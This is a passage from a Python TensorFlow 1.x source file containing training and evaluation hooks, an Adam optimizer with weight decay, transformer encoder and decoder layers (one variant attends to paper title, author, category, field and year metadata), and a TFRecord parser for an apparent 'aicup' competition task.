two essential differences with the situation in which `begin` is called:\n\n * When this is called, the graph is finalized and ops can no longer be added\n to the graph.\n * This method will also be called as a result of recovering a wrapped\n session, not only at the beginning of the overall session.\n\n Args:\n session: A TensorFlow Session that has been created.\n coord: A Coordinator object which keeps track of all threads.\n \"\"\"\n # print('after_create_session', initial, epoch)\n # setup progressbar\n self.pbar = tqdm(\n total=self._total,\n unit='seq',\n desc='Eval',\n mininterval=0.1,\n maxinterval=10.0,\n miniters=None,\n file=orig_stdout,\n dynamic_ncols=True,\n smoothing=0,\n bar_format=None,\n initial=0,\n postfix=None\n )\n\n def before_run(self, run_context): # pylint: disable=unused-argument\n \"\"\"Called before each call to run().\n\n You can return from this call a `SessionRunArgs` object indicating ops or\n tensors to add to the upcoming `run()` call. These ops/tensors will be run\n together with the ops/tensors originally passed to the original run() call.\n The run args you return can also contain feeds to be added to the run()\n call.\n\n The `run_context` argument is a `SessionRunContext` that provides\n information about the upcoming `run()` call: the originally requested\n op/tensors, the TensorFlow Session.\n\n At this point graph is finalized and you can not add ops.\n\n Args:\n run_context: A `SessionRunContext` object.\n\n Returns:\n None or a `SessionRunArgs` object.\n \"\"\"\n return tf.train.SessionRunArgs(self._n_tensor)\n\n def after_run(self, run_context, run_values):\n \"\"\"Called after each call to run().\n\n The `run_values` argument contains results of requested ops/tensors by\n `before_run()`.\n\n The `run_context` argument is the same one send to `before_run` call.\n `run_context.request_stop()` can be called to stop the iteration.\n\n If `session.run()` raises any exceptions then `after_run()` is not called.\n\n Args:\n run_context: A `SessionRunContext` object.\n run_values: A SessionRunValues object.\n \"\"\"\n # print('run_values', run_values.results)\n # update progressbar\n self.pbar.update(run_values.results)\n\n def end(self, session):\n \"\"\"Called at the end of session.\n\n The `session` argument can be used in case the hook wants to run final ops,\n such as saving a last checkpoint.\n\n If `session.run()` raises exception other than OutOfRangeError or\n StopIteration then `end()` is not called.\n Note the difference between `end()` and `after_run()` behavior when\n `session.run()` raises OutOfRangeError or StopIteration. In that case\n `end()` is called but `after_run()` is not called.\n\n Args:\n session: A TensorFlow Session that will be soon closed.\n \"\"\"\n self.pbar.close()\n\n\nclass ColoredLoggingTensorHook(tf.train.LoggingTensorHook):\n \"\"\"Prints the given tensors every N local steps, every N seconds, or at end.\n\n The tensors will be printed to the log, with `INFO` severity. If you are not\n seeing the logs, you might want to add the following line after your imports:\n\n ```python\n tf.logging.set_verbosity(tf.logging.INFO)\n ```\n\n Note that if `at_end` is True, `tensors` should not include any tensor\n whose evaluation produces a side effect such as consuming additional inputs.\n \"\"\"\n def _log_tensors(self, tensor_values):\n original = np.get_printoptions()\n np.set_printoptions(suppress=True)\n elapsed_secs, _ = self._timer.update_last_triggered_step(\n self._iter_count\n )\n if self._formatter:\n if elapsed_secs is not None:\n tf.logging.info(\n \"%s (%.3f sec)\", self._formatter(tensor_values),\n elapsed_secs\n )\n else:\n tf.logging.info(self._formatter(tensor_values))\n else:\n stats = []\n for tag in self._tag_order:\n stats.append(\"%s = %s\" % (tag, tensor_values[tag]))\n if elapsed_secs is not None:\n tf.logging.info(\"%s (%.3f sec)\", \", \".join(stats), elapsed_secs)\n else:\n tf.logging.info(\"%s\", \", \".join(stats))\n np.set_printoptions(**original)\n\n\nclass NumpyEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.integer):\n return int(obj)\n elif isinstance(obj, np.floating):\n return float(obj)\n elif isinstance(obj, np.ndarray):\n return obj.tolist()\n else:\n return super(NumpyEncoder, self).default(obj)\n\n\nclass SaveEvaluationResultHook(tf.train.SessionRunHook):\n \"\"\"Saves evaluation results to disk for external use.\n Saves one file per batch in JSON format\n Remove padding for each sequence example and save:\n * protien sequence data\n * correct class\n * correct class prediction rank\n * correct class prediction probability\n * rank 1 prediction class\n * rank 1 prediction probability\n * rank N prediction class\n * rank N prediction probability\n\n protein shape=(batch_size, sequence_length), dtype=int32\n labels shape=(batch_size, sequence_length), dtype=int32\n top_probs shape=(batch_size, sequence_length, predict_top_k), dtype=float32\n top_classes shape=(batch_size, sequence_length, predict_top_k), dtype=int32\n\n logits shape=(batch_size, sequence_length, num_classes), dtype=float32\n ```python\n import tensorflow as tf\n tf.enable_eager_execution()\n aa_list = ' FLIMVPAWGSTYQNCO*UHKRDEBZX-'\n predict_top_k = 2\n batch, length, depth = (2, 3, 5)\n protein = tf.cast(tf.random_uniform([batch, length]) * len(aa_list), dtype=tf.int32)\n labels = tf.cast(tf.random_uniform([batch, length]) * depth, dtype=tf.int32)\n logits = tf.random_uniform([batch, length, depth])\n all_probs = tf.nn.softmax(logits=logits, axis=-1, name='softmax_tensor')\n top_probs, top_classes = tf.nn.top_k(all_probs, predict_top_k)\n label_prob = tf.gather(all_probs, tf.expand_dims(labels, -1), batch_dims=-1)\n # label_rank = tf.gather(tf.contrib.framework.argsort(all_probs, direction='DESCENDING'), tf.expand_dims(labels, -1), batch_dims=-1)\n label_rank = tf.reshape(tf.where(tf.equal(tf.contrib.framework.argsort(all_probs, direction='DESCENDING'), tf.expand_dims(labels, -1)))[:,-1], tf.shape(labels))\n label_rank = tf.reshape(tf.where(tf.equal(top_classes, tf.expand_dims(labels, -1)))[:,-1], tf.shape(labels))\n\n ```\n \"\"\"\n def __init__(\n self,\n # protein, lengths, labels, label_prob, label_rank,\n # top_classes, top_probs,\n tensors,\n model_dir,\n output_dir=None,\n output_prefix=None,\n output_format='json'\n ):\n \"\"\"Initializes this hook.\n Args:\n protein: protien sequence data.\n lengths: sequence lengths.\n labels: correct class.\n label_prob: correct class prediction rank.\n label_rank: correct class prediction probability.\n top_classes: rank N prediction class.\n top_probs: rank N prediction probability.\n output_dir: The output directory to save evaluation files. default: ${model_dir}/eval-${global_step}\n output_prefix: The output filename which will be suffixed by the current\n eval step. default: ${model_dir}@${global_step}-${eval_step}.${output_format}\n output_format: default: json\n \"\"\"\n # self._protein = protein\n # self._lengths = lengths\n # self._labels = labels\n # self._label_prob = label_prob\n # self._label_rank = label_rank\n # self._top_classes = top_classes\n # self._top_probs = top_probs\n self._tensors = tensors\n self._model_dir = model_dir\n self._output_dir = output_dir\n self._output_prefix = output_prefix\n self._output_format = output_format.lower()\n self._first_run = True\n\n def begin(self):\n # if self._protein is None:\n # raise RuntimeError('The model did not define any protein.')\n # if not self._labels:\n # raise RuntimeError('The model did not define any labels.')\n # if not self._label_prob:\n # raise RuntimeError('The model did not define label_prob.')\n # if not self._label_rank:\n # raise RuntimeError('The model did not define label_rank.')\n # if not self._top_classes:\n # raise RuntimeError('The model did not define top_classes.')\n # if not self._top_probs:\n # raise RuntimeError('The model did not define top_probs.')\n self._tensors['global_step'] = tf.train.get_global_step(\n ) # global step of checkpoint\n if self._tensors['global_step'] is None:\n raise RuntimeError(\n 'Global step should be created to use SaveEvaluationResultHook.'\n )\n self._tensors['eval_step'\n ] = tf.contrib.training.get_or_create_eval_step(\n ) # a counter for the evaluation step\n\n def before_run(self, run_context): # pylint: disable=unused-argument\n return tf.train.SessionRunArgs(self._tensors)\n\n def after_run(self, run_context, run_values): # pylint: disable=unused-argument\n results = run_values.results\n global_step = results['global_step']\n del results['global_step']\n eval_step = results['eval_step']\n del results['eval_step']\n lengths = results['lengths'].tolist()\n del results['lengths']\n # generate default output_dir and output_prefix if needed\n if not self._output_dir:\n self._output_dir = str(\n Path(self._model_dir) / 'eval-{}'.format(global_step)\n )\n if not self._output_prefix:\n self._output_prefix = '{}@{}'.format(\n Path(self._model_dir).name, global_step\n )\n output_path = Path(self._output_dir) / '{}-{}.{}'.format(\n self._output_prefix, eval_step, self._output_format\n )\n if self._first_run:\n self._first_run = False\n # make sure directories exist\n output_path.parent.mkdir(parents=True, exist_ok=True) # pylint: disable=no-member\n # remove padding\n reslist = []\n for i in range(len(lengths)):\n res = {'length': lengths[i]}\n for k in results.keys():\n # print(i, k, lengths[i])\n res[k] = results[k][i][:lengths[i]].tolist()\n reslist.append(res)\n\n if self._output_format == 'json':\n with output_path.open(encoding='utf-8', mode='w') as f: # pylint: disable=no-member\n json.dump(\n reslist, f, indent=2, sort_keys=False, cls=NumpyEncoder\n )\n # e1 = json.loads(Path(r'4951306-1.json').read_text())\n elif self._output_format == 'msgpack':\n with output_path.open(mode='wb') as f: # pylint: disable=no-member\n msgpack.dump(reslist, f)\n # e1 = msgpack.loads(Path(r'4951306-1.msgpack').read_bytes())\n elif self._output_format == 'msgpack.gz':\n with gzip.open(output_path, mode='wb') as f: # pylint: disable=no-member\n msgpack.dump(reslist, f)\n # e1 = msgpack.loads(Path(r'4951306-1.msgpack').read_bytes())\n\n def end(self, session):\n tf.logging.info('Evaluation results saved to %s', self._output_dir)\n # if self._post_evaluation_fn is not None:\n # self._post_evaluation_fn(self._current_step, self._output_path)\n\n\nclass AdamWeightDecayOptimizer(tf.train.Optimizer):\n \"\"\"A basic Adam optimizer that includes \"correct\" L2 weight decay.\"\"\"\n def __init__(\n self,\n learning_rate,\n weight_decay_rate=0.0,\n beta_1=0.9,\n beta_2=0.999,\n epsilon=1e-6,\n exclude_from_weight_decay=None,\n name=\"AdamWeightDecayOptimizer\"\n ):\n \"\"\"Constructs a AdamWeightDecayOptimizer.\"\"\"\n super(AdamWeightDecayOptimizer, self).__init__(False, name)\n\n self.learning_rate = learning_rate\n self.weight_decay_rate = weight_decay_rate\n self.beta_1 = beta_1\n self.beta_2 = beta_2\n self.epsilon = epsilon\n self.exclude_from_weight_decay = exclude_from_weight_decay\n\n def apply_gradients(self, grads_and_vars, global_step=None, name=None):\n \"\"\"See base class.\"\"\"\n assignments = []\n for (grad, param) in grads_and_vars:\n if grad is None or param is None:\n continue\n\n param_name = self._get_variable_name(param.name)\n\n m = tf.get_variable(\n name=param_name + \"/adam_m\",\n shape=param.shape.as_list(),\n dtype=tf.float32,\n trainable=False,\n initializer=tf.zeros_initializer()\n )\n v = tf.get_variable(\n name=param_name + \"/adam_v\",\n shape=param.shape.as_list(),\n dtype=tf.float32,\n trainable=False,\n initializer=tf.zeros_initializer()\n )\n\n # Standard Adam update.\n next_m = (\n tf.multiply(self.beta_1, m) +\n tf.multiply(1.0 - self.beta_1, grad)\n )\n next_v = (\n tf.multiply(self.beta_2, v) +\n tf.multiply(1.0 - self.beta_2, tf.square(grad))\n )\n\n update = next_m / (tf.sqrt(next_v) + self.epsilon)\n\n # Just adding the square of the weights to the loss function is *not*\n # the correct way of using L2 regularization/weight decay with Adam,\n # since that will interact with the m and v parameters in strange ways.\n #\n # Instead we want ot decay the weights in a manner that doesn't interact\n # with the m/v parameters. This is equivalent to adding the square\n # of the weights to the loss with plain (non-momentum) SGD.\n if self._do_use_weight_decay(param_name):\n update += self.weight_decay_rate * param\n\n update_with_lr = self.learning_rate * update\n\n next_param = param - update_with_lr\n\n assignments.extend(\n [param.assign(next_param),\n m.assign(next_m),\n v.assign(next_v)]\n )\n return tf.group(*assignments, name=name)\n\n def _do_use_weight_decay(self, param_name):\n \"\"\"Whether to use L2 weight decay for `param_name`.\"\"\"\n if self.exclude_from_weight_decay:\n for r in self.exclude_from_weight_decay:\n if re.search(r, param_name) is not None:\n return False\n return True\n\n def _get_variable_name(self, param_name):\n \"\"\"Get the variable name from the tensor name.\"\"\"\n m = re.match(\"^(.*):\\\\d+$\", param_name)\n if m is not None:\n param_name = m.group(1)\n return param_name\n\n\n# Transformer Layers\ndef get_angles(pos, i, d_model):\n angle_rates = 1 / np.power(10000, (2 * (i // 2)) / np.float32(d_model))\n return pos * angle_rates\n\n\ndef positional_encoding(position, d_model):\n angle_rads = get_angles(\n np.arange(position)[:, np.newaxis],\n np.arange(d_model)[np.newaxis, :], d_model\n )\n # apply sin to even indices in the array; 2i\n angle_rads[:, 0::2] = np.sin(angle_rads[:, 0::2])\n # apply cos to odd indices in the array; 2i+1\n angle_rads[:, 1::2] = np.cos(angle_rads[:, 1::2])\n pos_encoding = angle_rads[np.newaxis, ...]\n return tf.cast(pos_encoding, dtype=tf.float32)\n\n\ndef scaled_dot_product_attention(q, k, v, mask):\n \"\"\"Calculate the attention weights.\n q, k, v must have matching leading dimensions.\n k, v must have matching penultimate dimension, i.e.: seq_len_k = seq_len_v.\n The mask has different shapes depending on its type(padding or look ahead) \n but it must be broadcastable for addition.\n Args:\n q: query shape == (..., seq_len_q, depth)\n k: key shape == (..., seq_len_k, depth)\n v: value shape == (..., seq_len_v, depth_v)\n mask: Float tensor with shape broadcastable \n to (..., seq_len_q, seq_len_k). Defaults to None.\n Returns:\n output, attention_weights\n \"\"\"\n matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k)\n # scale matmul_qk\n dk = tf.cast(tf.shape(k)[-1], tf.float32)\n scaled_attention_logits = matmul_qk / tf.math.sqrt(dk)\n # add the mask to the scaled tensor.\n if mask is not None:\n scaled_attention_logits += (mask * -1e9)\n # softmax is normalized on the last axis (seq_len_k) so that the scores\n # add up to 1.\n attention_weights = tf.nn.softmax(\n scaled_attention_logits, axis=-1\n ) # (..., seq_len_q, seq_len_k)\n # seq_len_k == seq_len_v\n output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v)\n return output, attention_weights\n\n\ndef gelu(x):\n \"\"\"Gaussian Error Linear Unit.\n This is a smoother version of the RELU.\n Original paper: https://arxiv.org/abs/1606.08415\n Args:\n x: float Tensor to perform activation.\n Returns:\n `x` with the GELU activation applied.\n \"\"\"\n cdf = 0.5 * (\n 1.0 + tf.tanh((np.sqrt(2 / np.pi) * (x + 0.044715 * tf.pow(x, 3))))\n )\n return x * cdf\n\n\ndef point_wise_feed_forward_network(d_model, dff):\n return tf.keras.Sequential(\n [\n tf.keras.layers.Dense(\n dff,\n activation=gelu,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02)\n ), # (batch_size, seq_len, dff)\n tf.keras.layers.Dense(\n d_model,\n activation=None,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02)\n ) # (batch_size, seq_len, d_model)\n ]\n )\n\n\nclass MultiHeadAttention(tf.keras.layers.Layer):\n def __init__(self, d_model, num_heads, rate=0.1):\n super(MultiHeadAttention, self).__init__()\n self.num_heads = num_heads\n self.d_model = d_model\n\n assert d_model % self.num_heads == 0\n\n self.depth = d_model // self.num_heads\n\n self.wq = tf.keras.layers.Dense(\n units=d_model,\n activation=None,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02)\n )\n self.wk = tf.keras.layers.Dense(\n units=d_model,\n activation=None,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02)\n )\n self.wv = tf.keras.layers.Dense(\n units=d_model,\n activation=None,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02)\n )\n\n self.dropout = tf.keras.layers.Dropout(rate)\n self.dense = tf.keras.layers.Dense(\n d_model,\n activation=None,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02)\n )\n\n def split_heads(self, x, batch_size):\n \"\"\"Split the last dimension into (num_heads, depth).\n Transpose the result such that the shape is (batch_size, num_heads, seq_len, depth)\n \"\"\"\n x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth))\n return tf.transpose(x, perm=[0, 2, 1, 3])\n\n def call(self, v, k, q, mask, training):\n batch_size = tf.shape(q)[0]\n\n v = self.wv(v) # (batch_size, seq_len, d_model)\n k = self.wk(k) # (batch_size, seq_len, d_model)\n q = self.wq(q) # (batch_size, seq_len, d_model)\n\n v = self.split_heads(\n v, batch_size\n ) # (batch_size, num_heads, seq_len_v, depth)\n k = self.split_heads(\n k, batch_size\n ) # (batch_size, num_heads, seq_len_k, depth)\n q = self.split_heads(\n q, batch_size\n ) # (batch_size, num_heads, seq_len_q, depth)\n\n # scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth)\n # attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k)\n matmul_qk = tf.matmul(\n q, k, transpose_b=True\n ) # (..., seq_len_q, seq_len_k)\n # scale matmul_qk\n dk = tf.cast(tf.shape(k)[-1], tf.float32)\n scaled_attention_logits = matmul_qk / tf.math.sqrt(dk)\n # add the mask to the scaled tensor.\n if mask is not None:\n scaled_attention_logits += (mask * -10000.0)\n # softmax is normalized on the last axis (seq_len_k) so that the scores\n # add up to 1.\n attention_weights = tf.nn.softmax(\n scaled_attention_logits, axis=-1\n ) # (..., seq_len_q, seq_len_k)\n # seq_len_k == seq_len_v\n attention_weights = self.dropout(attention_weights, training=training)\n scaled_attention = tf.matmul(\n attention_weights, v\n ) # (..., seq_len_q, depth_v)\n\n scaled_attention = tf.transpose(\n scaled_attention, perm=[0, 2, 1, 3]\n ) # (batch_size, seq_len_q, num_heads, depth)\n\n concat_attention = tf.reshape(\n scaled_attention, (batch_size, -1, self.d_model)\n ) # (batch_size, seq_len_q, d_model)\n\n output = self.dense(\n concat_attention\n ) # (batch_size, seq_len_q, d_model)\n\n return output, attention_weights\n\n\nclass EncoderLayer(tf.keras.layers.Layer):\n def __init__(self, d_model, num_heads, dff, rate=0.1):\n super(EncoderLayer, self).__init__()\n\n self.mha = MultiHeadAttention(d_model, num_heads, rate)\n self.ffn = point_wise_feed_forward_network(d_model, dff)\n\n self.layernorm1 = tf.keras.layers.LayerNormalization(epsilon=1e-12)\n self.layernorm2 = tf.keras.layers.LayerNormalization(epsilon=1e-12)\n\n self.dropout1 = tf.keras.layers.Dropout(rate)\n self.dropout2 = tf.keras.layers.Dropout(rate)\n\n def call(self, inputs, training, mask):\n\n attn_output, _ = self.mha(\n inputs, inputs, inputs, mask, training=training\n ) # (batch_size, input_seq_len, d_model)\n attn_output = self.dropout1(attn_output, training=training)\n out1 = self.layernorm1(\n inputs + attn_output\n ) # (batch_size, input_seq_len, d_model)\n\n ffn_output = self.ffn(out1) # (batch_size, input_seq_len, d_model)\n ffn_output = self.dropout2(ffn_output, training=training)\n out2 = self.layernorm2(\n out1 + ffn_output\n ) # (batch_size, input_seq_len, d_model)\n\n return out2\n\n\nclass DecoderLayer(tf.keras.layers.Layer):\n def __init__(self, d_model, num_heads, dff, rate=0.1):\n super(DecoderLayer, self).__init__()\n\n self.mha1 = MultiHeadAttention(d_model, num_heads, rate)\n self.mha2 = MultiHeadAttention(d_model, num_heads, rate)\n\n self.ffn = point_wise_feed_forward_network(d_model, dff)\n\n self.layernorm1 = tf.keras.layers.LayerNormalization(epsilon=1e-12)\n self.layernorm2 = tf.keras.layers.LayerNormalization(epsilon=1e-12)\n self.layernorm3 = tf.keras.layers.LayerNormalization(epsilon=1e-12)\n\n self.dropout1 = tf.keras.layers.Dropout(rate)\n self.dropout2 = tf.keras.layers.Dropout(rate)\n self.dropout3 = tf.keras.layers.Dropout(rate)\n\n def call(self, inputs, attend_to, training, inputs_mask, attend_to_mask):\n # enc_output.shape == (batch_size, input_seq_len, d_model)\n\n attn1, _ = self.mha1(\n inputs, k=inputs, q=inputs, mask=inputs_mask, training=training\n ) # (batch_size, target_seq_len, d_model)\n attn1 = self.dropout1(attn1, training=training)\n out1 = self.layernorm1(attn1 + inputs)\n\n attn2, _ = self.mha2(\n attend_to,\n k=attend_to,\n q=out1,\n mask=attend_to_mask,\n training=training\n ) # (batch_size, target_seq_len, d_model)\n attn2 = self.dropout2(attn2, training=training)\n out2 = self.layernorm2(\n attn2 + out1\n ) # (batch_size, target_seq_len, d_model)\n\n ffn_output = self.ffn(out2) # (batch_size, target_seq_len, d_model)\n ffn_output = self.dropout3(ffn_output, training=training)\n out3 = self.layernorm3(\n ffn_output + out2\n ) # (batch_size, target_seq_len, d_model)\n\n return out3\n\n\nclass DecoderLayer5(tf.keras.layers.Layer):\n def __init__(self, d_model, num_heads, dff, rate=0.1):\n super(DecoderLayer5, self).__init__()\n\n self.mha1 = MultiHeadAttention(d_model, num_heads, rate)\n self.title_mha = MultiHeadAttention(d_model, num_heads, rate)\n self.authors_mha = MultiHeadAttention(d_model, num_heads, rate)\n self.categories_mha = MultiHeadAttention(d_model, num_heads, rate)\n self.fields_mha = MultiHeadAttention(d_model, num_heads, rate)\n self.year_mha = MultiHeadAttention(d_model, num_heads, rate)\n\n self.ffn = point_wise_feed_forward_network(d_model, dff)\n\n self.layernorm1 = tf.keras.layers.LayerNormalization(epsilon=1e-12)\n self.layernorm2 = tf.keras.layers.LayerNormalization(epsilon=1e-12)\n self.layernorm3 = tf.keras.layers.LayerNormalization(epsilon=1e-12)\n\n self.dropout1 = tf.keras.layers.Dropout(rate)\n self.title_dropout = tf.keras.layers.Dropout(rate)\n self.authors_dropout = tf.keras.layers.Dropout(rate)\n self.categories_dropout = tf.keras.layers.Dropout(rate)\n self.fields_dropout = tf.keras.layers.Dropout(rate)\n self.year_dropout = tf.keras.layers.Dropout(rate)\n self.dropout3 = tf.keras.layers.Dropout(rate)\n\n def call(self, inputs, training, inputs_mask, title, title_mask, authors, authors_mask, categories, categories_mask, fields, fields_mask, year, year_mask):\n # enc_output.shape == (batch_size, input_seq_len, d_model)\n\n attn1, _ = self.mha1(\n inputs, k=inputs, q=inputs, mask=inputs_mask, training=training\n ) # (batch_size, target_seq_len, d_model)\n attn1 = self.dropout1(attn1, training=training)\n out1 = self.layernorm1(attn1 + inputs)\n\n title_attn, _ = self.title_mha(\n title,\n k=title,\n q=out1,\n mask=title_mask,\n training=training\n ) # (batch_size, target_seq_len, d_model)\n title_attn = self.title_dropout(title_attn, training=training)\n authors_attn, _ = self.authors_mha(\n authors,\n k=authors,\n q=out1,\n mask=authors_mask,\n training=training\n ) # (batch_size, target_seq_len, d_model)\n authors_attn = self.authors_dropout(authors_attn, training=training)\n categories_attn, _ = self.categories_mha(\n categories,\n k=categories,\n q=out1,\n mask=categories_mask,\n training=training\n ) # (batch_size, target_seq_len, d_model)\n categories_attn = self.categories_dropout(categories_attn, training=training)\n fields_attn, _ = self.fields_mha(\n fields,\n k=fields,\n q=out1,\n mask=fields_mask,\n training=training\n ) # (batch_size, target_seq_len, d_model)\n fields_attn = self.fields_dropout(fields_attn, training=training)\n year_attn, _ = self.year_mha(\n year,\n k=year,\n q=out1,\n mask=year_mask,\n training=training\n ) # (batch_size, target_seq_len, d_model)\n year_attn = self.year_dropout(year_attn, training=training)\n out2 = self.layernorm2(\n out1 + title_attn + authors_attn + categories_attn + fields_attn + year_attn\n ) # (batch_size, target_seq_len, d_model)\n\n ffn_output = self.ffn(out2) # (batch_size, target_seq_len, d_model)\n ffn_output = self.dropout3(ffn_output, training=training)\n out3 = self.layernorm3(\n ffn_output + out2\n ) # (batch_size, target_seq_len, d_model)\n\n return out3\n\n\nclass TransformerEncoder(tf.keras.layers.Layer):\n def __init__(\n self,\n num_layers,\n d_model,\n num_heads,\n dff,\n input_vocab_size,\n maximum_position_encoding,\n rate=0.1\n ):\n super(TransformerEncoder, self).__init__()\n\n self.d_model = d_model\n self.num_layers = num_layers\n\n self.embedding = tf.keras.layers.Embedding(input_vocab_size, d_model)\n self.pos_encoding = positional_encoding(\n maximum_position_encoding, self.d_model\n )\n\n self.enc_layers = [\n EncoderLayer(d_model, num_heads, dff, rate)\n for _ in range(num_layers)\n ]\n\n self.dropout = tf.keras.layers.Dropout(rate)\n\n def call(self, x, training, mask):\n\n seq_len = tf.shape(x)[1]\n\n # adding embedding and position encoding.\n x = self.embedding(x) # (batch_size, input_seq_len, d_model)\n x *= tf.math.sqrt(tf.cast(self.d_model, tf.float32))\n x += self.pos_encoding[:, :seq_len, :]\n\n x = self.dropout(x, training=training)\n\n for i in range(self.num_layers):\n x = self.enc_layers[i](x, training, mask)\n\n return x # (batch_size, input_seq_len, d_model)\n\n\nclass TransformerDecoder(tf.keras.layers.Layer):\n def __init__(\n self,\n num_layers,\n d_model,\n num_heads,\n dff,\n target_vocab_size,\n maximum_position_encoding,\n rate=0.1\n ):\n super(TransformerDecoder, self).__init__()\n\n self.d_model = d_model\n self.num_layers = num_layers\n\n self.embedding = tf.keras.layers.Embedding(target_vocab_size, d_model)\n self.pos_encoding = positional_encoding(\n maximum_position_encoding, d_model\n )\n\n self.dec_layers = [\n DecoderLayer(d_model, num_heads, dff, rate)\n for _ in range(num_layers)\n ]\n self.dropout = tf.keras.layers.Dropout(rate)\n\n def call(self, inputs, enc_output, training, look_ahead_mask, padding_mask):\n\n seq_len = tf.shape(inputs)[1]\n\n inputs = self.embedding(inputs) # (batch_size, target_seq_len, d_model)\n inputs *= tf.math.sqrt(tf.cast(self.d_model, tf.float32))\n inputs += self.pos_encoding[:, :seq_len, :]\n inputs = self.dropout(inputs, training=training)\n\n for i in range(self.num_layers):\n inputs = self.dec_layers[i](\n inputs, enc_output, training, look_ahead_mask, padding_mask\n )\n\n # inputs.shape == (batch_size, target_seq_len, d_model)\n return inputs\n\n\ndef parse_aicup3_v16_tfrecords(serialized, mode, params):\n \"\"\"Parse a single aicup task1 v1 record which is expected to be a tensorflow.Example.\"\"\"\n features = {\n 'sentence_lengths': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'length': tf.FixedLenFeature(shape=(), dtype=tf.string),\n # 'embeddings': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'title_pooled': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'meta_pooled': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'segment_ids': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'authors': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'categories': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'fields': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'year': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'input_ids': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'title_length': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'title_input_ids': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'meta_length': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'meta_input_ids': tf.FixedLenFeature(shape=(), dtype=tf.string)\n }\n if mode != tf.estimator.ModeKeys.PREDICT:\n features['sentence_labels'] = tf.FixedLenFeature(\n shape=(), dtype=tf.string\n )\n features['labels'] = tf.FixedLenFeature(shape=(), dtype=tf.string)\n features['article_labels'] = tf.FixedLenFeature(\n shape=(), dtype=tf.string\n )\n parsed = tf.parse_single_example(\n serialized=serialized,\n # A scalar (0-D Tensor) of type string, a single binary\n # serialized `Example` proto.\n features=features,\n # A `dict` mapping feature keys to `FixedLenFeature` or\n # `VarLenFeature` values.\n example_names=None,\n # A scalar string Tensor, the associated name (optional).\n name=None\n # A name for this operation (optional).\n )\n features = {}\n features['sentence_lengths'] = tf.decode_raw(\n parsed['sentence_lengths'],\n out_type=tf.int32,\n little_endian=True,\n name=None\n )\n features['sentence_sequence_length'] = tf.shape(\n input=features['sentence_lengths'], name=None, out_type=tf.int32\n )[0]\n features['length'] = tf.decode_raw(\n parsed['length'], out_type=tf.int32, little_endian=True, name=None\n )[0]\n # features['embeddings'] = tf.reshape(\n # tf.decode_raw(\n # parsed['embeddings'],\n # out_type=tf.float32,\n # little_endian=True,\n # name=None\n # ), [features['length'], -1]\n # )\n features['title_pooled'] = tf.decode_raw(\n parsed['title_pooled'],\n out_type=tf.float32,\n little_endian=True,\n name=None\n )\n features['meta_pooled'] = tf.decode_raw(\n parsed['meta_pooled'],\n out_type=tf.float32,\n little_endian=True,\n name=None\n )\n features['segment_ids'] = tf.cast(\n tf.decode_raw(\n parsed['segment_ids'],\n out_type=tf.uint8,\n little_endian=True,\n name=None\n ), tf.int32\n )\n features['authors'] = tf.decode_raw(\n parsed['authors'], out_type=tf.int32, little_endian=True, name=None\n )\n features['categories'] = tf.cast(\n tf.decode_raw(\n parsed['categories'],\n out_type=tf.uint8,\n little_endian=True,\n name=None\n ), tf.int32\n )\n features['fields'] = tf.cast(\n tf.decode_raw(\n parsed['fields'], out_type=tf.uint8, little_endian=True, name=None\n ), tf.int32\n )\n features['year'] = tf.cast(\n tf.decode_raw(\n parsed['year'], out_type=tf.uint8, little_endian=True, name=None\n ), tf.int32\n ) # 12\n features['input_ids'] = tf.decode_raw(\n parsed['input_ids'], out_type=tf.int32, little_endian=True, name=None\n )\n features['title_length'] = tf.decode_raw(\n parsed['title_length'],\n out_type=tf.int32,\n little_endian=True,\n name=None\n )[0]\n features['title_input_ids'] = tf.decode_raw(\n parsed['title_input_ids'],\n out_type=tf.int32,\n little_endian=True,\n name=None\n )\n features['meta_length'] = tf.decode_raw(\n parsed['meta_length'], out_type=tf.int32, little_endian=True, name=None\n )[0]\n features['meta_input_ids'] = tf.decode_raw(\n parsed['meta_input_ids'],\n out_type=tf.int32,\n little_endian=True,\n name=None\n )\n if mode != tf.estimator.ModeKeys.PREDICT:\n features['sentence_labels'] = tf.cast(\n tf.decode_raw(\n parsed['sentence_labels'],\n out_type=tf.uint8,\n little_endian=True,\n name=None\n ), tf.int32\n )\n labels = tf.cast(\n tf.decode_raw(parsed['labels'], out_type=tf.uint8), tf.int32\n )\n features['article_labels'] = tf.cast(\n tf.decode_raw(\n parsed['article_labels'],\n out_type=tf.uint8,\n little_endian=True,\n name=None\n ), tf.int32\n )[0]\n # sparse_softmax_cross_entropy_with_logits expects int32 or int64\n # tf.Tensor: shape=(sequence_length,), dtype=int32\n return features, labels\n else:\n return features\n\n\ndef input_fn(mode, params, config):\n \"\"\"Estimator `input_fn`.\n Args:\n mode: Specifies if training, evaluation or\n prediction. tf.estimator.ModeKeys.{TRAIN, EVAL, PREDICT}\n params: model_params `dict` of hyperparameters. Will receive what\n is passed to Estimator in `params` parameter. This allows\n to configure Estimators from hyper parameter tuning.positional_encoding\n config: run_config configuration object. Will receive what is passed\n to Estimator in `config` parameter, or the default `config`.\n Allows updating things in your `model_fn` based on\n configuration such as `num_ps_replicas`, or `model_dir`.\n Returns:\n A 'tf.data.Dataset' object\n \"\"\"\n # the file names will be shuffled randomly during training\n 